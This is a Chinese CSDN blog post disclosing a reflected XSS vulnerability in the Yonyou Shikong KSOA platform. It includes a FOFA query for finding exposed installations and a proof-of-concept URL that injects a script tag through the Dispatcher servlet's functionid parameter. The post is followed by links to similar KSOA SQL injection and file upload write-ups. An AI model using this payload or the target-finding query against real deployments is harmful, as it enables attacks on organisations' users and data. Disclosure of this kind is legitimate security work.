用友时空KSOA 存在反射XSS

马船长

于 2024-08-02 12:30:26 发布

阅读量249

点赞数 3

文章标签： xss 安全网络

本文链接：https://blog.csdn.net/2301_77012231/article/details/140869405

版权

漏洞描述

用友时空KSOA 存在反射型跨站脚本攻击（XSS）漏洞，通过向用户提供恶意链接或注入恶意代码来利用。当用户点击这些链接或访问包含恶意代码的页面时，攻击者可以在用户的浏览器中执行恶意脚本，从而窃取用户信息、会话令牌等敏感数据或对用户进行其他有害操作。及时修复这种漏洞非常重要，以确保系统和用户数据的安全。

资产测绘

FOFA:app="用友-时空KSOA"

漏洞复现

POC

http://IP/servlet/com.sksoft.v8.portal.Dispatcher?functionid=%3CsCrIpT%3Ealert(1)%3C/ScRiPt%3E&uuid=@1.1.1.1&runmode=direct&pid=null

漏洞修复

对系统做输入验证和过滤

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

马船长

关注关注

3
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

用友时空 KSOA 多处SQL注入漏洞复现

0xSec

12-13

1503

用友时空 KSOA 系统 PayBill、QueryService、linkadd.jsp等接口处存在 sql 注入漏洞，攻击者可通过这些漏洞获取数据库权限,启用xp_cmdshell 可执行任意命令获取服务器权限。

用友时空KSOA存在sql注入漏洞附POC

nnn2188185的博客

09-24

517

用友时空KSOA是建立在SOA理念指导下研发的新一代产品，该产品common/dept.jsp接口存在SQL注入漏洞。

参与评论您还未登录，请先登录后发表或查看评论

某购物商城系统commodtiy接口处存在任意文件上传漏洞

weixin_43167326的博客

05-10

875

某购物商城系统commodtiy接口处存在任意文件上传漏洞,恶意攻击者可以上传恶意软件，例如后门、木马或勒索软件，以获取对服务器的远程访问权限或者破坏系统，对服务器造成极大的安全隐患。

用友-时空KSOA QueryService sql注入漏洞复现_笔记

m0_50488257的博客

04-26

346

用友-时空KSOA；SQL SERVER ;sql 注入；漏洞复现；

用友时空KSOA、CCERP sql注入漏洞复现

09-25

428

用友时空KSOA是建立在SOA理念指导下研发的新一代产品，是根据流通企业最前沿的I需求推出的统一的IT基础架构，它可以让流通企业各个时期建立的IT系统之间彼此轻松对话，帮助流通企业保护原有的IT投资，简化IT管理，提升竞争能力，确保企业整体的战略目标以及创新活动的实现。

用友时空KSOA SQL注入漏洞[2023-HW]

holyxp的博客

08-16

1096

用友时空KSOA 多处 SQL注入漏洞复现

最新发布

0xSec

07-31

575

用友时空KSOA系统 PrintZP.jsp、PrintZPFB.jsp、PrintZPYG.jsp、PrintZPZP.jsp、fillKP.jsp等多处接口处存在SQL注入漏洞，未经身份验证的远程攻击者除了可以利用SQL注入漏洞获取数据库中的信息（例如，管理员后台密码、站点的用户个人信息）之外，甚至在高权限的情况可向服务器中写入木马，进一步获取服务器系统权限。

用友时空KSOA SQL注入漏洞复现

0xSec

08-13

2605

用友时空KSOA /servlet/com.sksoft.v8.trans.servlet.TaskRequestServlet接口和/servlet/imagefield接口处存在sql注入漏洞，未经身份认证的攻击者可通过该漏洞获取数据库敏感信息及凭证，最终可能导致服务器失陷。

用友时空KSOA PreviewKPQT SQL注入漏洞复现

0xSec

07-25

3224

用友时空KSOA PreviewKPQT.jsp接口处存在SQL注入漏洞，未经身份验证的远程攻击者除了可以利用SQL注入漏洞获取数据库中的信息（例如，管理员后台密码、站点的用户个人信息）之外，甚至在高权限的情况可向服务器中写入木马，进一步获取服务器系统权限。

用友时空KSOA ImageUpload任意文件上传漏洞复现+利用

0xSec

04-04

2388

用友时空KSOA平台ImageUpload处存在任意文件上传漏洞，攻击者通过漏洞可以获取服务器权限。

KSOA供应链管理系统

05-26

用友时空 KSOA供应链管理系统

用友时空KSOA V9.0文件上传漏洞复现

06-21

1324

用友时空KSOA平台ImageUpload处存在任意文件上传漏洞，攻击者通过漏洞可以获取服务器权限。

【1day】用友时空KSOA平台任意文件上传漏洞学习

记录并分享学习安全的知识点..

09-29

380

用友时空KSOA平台是由用友网络科技股份有限公司开发的一款企业级协同办公平台，旨在提高企业管理效率和协作效率。该平台提供了多种功能模块，包括组织管理、人力资源管理、工作流管理、知识管理、项目管理、文档管理等。用友时空KSOA平台存在任意文件上传漏洞，攻击者通过上传恶意文件，从而在Web服务器上执行未经授权的操作。

用友时空CCERP/KSOA/CDM数据字典自生成脚本

az44yao的专栏

03-21

2454

--自生成V7/CCERP/KSOA/CDM系列的数据字典 SELECT b.tbname 英文表名,b.chnname 中文表名,a.name as 英文字段名, isnull(c.chnname,'') as 中文字段名, d.name AS 字段类型,case when a.xtype in (239,231,175,167) then a.length else 0 end as 长度

用友时空KSOAV9.0文件上传漏洞复现

weixin_53884648的博客

05-22

1279

用友时空文件上传漏洞复现

用友时空KSOA软件前台文件上传漏洞

holyxp的博客

08-01

684

用友时空KSOA是建立在SOA理念指导下研发的新一代产品，是根据流通企业最前沿的I需求推出的统一的IT基础架构，它可以让流通企业各个时期建立的IT系统之间彼此轻松对话，帮助流通企业保护原有的IT投资，简化IT管理，提升竞争能力，确保企业整体的战略目标以及创新活动的实现。用友时空KSOA平台ImageUpload处存在任意文件上传漏洞，攻击者通过漏洞可以获取服务器权限。

用友时空KSOA sKeyvalue SQL注入漏洞复现

Keepb1ue的博客

12-29

706

用友KSOA是用友集团推出的一款基于SOA架构的企业级应用平台，旨在为企业提供全面的信息化解决方案。它包括了多个模块，如财务管理、人力资源管理、供应链管理等，可以帮助企业实现数字化转型。它可以让流通企业各个时期建立的IT系统之间彼此轻松对话，帮助流通企业保护原有的IT投资，简化IT管理，提升竞争能力，确保企业整体的战略目标以及创新活动的实现。

用友时空CDM与KSOA版本的关系

az44yao的专栏

12-15

1678

CDM是用友收购时空后推出的新版本，是在KSOA基础上做的简化版本，且增加了与用友财务软件的接口。 CDM版本的目标是提升规模化交付能力，所以更侧重于采取‘参数配置’的方式去满足用户的不同需求，相比KSOA版本，参数配置的能力使得实施的时候更加简化，但在适应更复杂需求方面则比较薄弱。不过凡事有利有弊，之前时空软件比较让人称道的‘二次开发’，由于对开发人员要求高，容易导致项目实施周期拖延，导致项目...

用友时空KSOA9.0技术手册：多架构对比与部署指南

《用友时空信息融通平台KSOA9.0技术手册》是由用友软件股份有限公司于2010年1月发布的一份全面指南，专为理解和部署KSOA9.0系统而设计。该手册主要分为五个部分，详尽地介绍了产品的架构设计、安装步骤、系统控制、...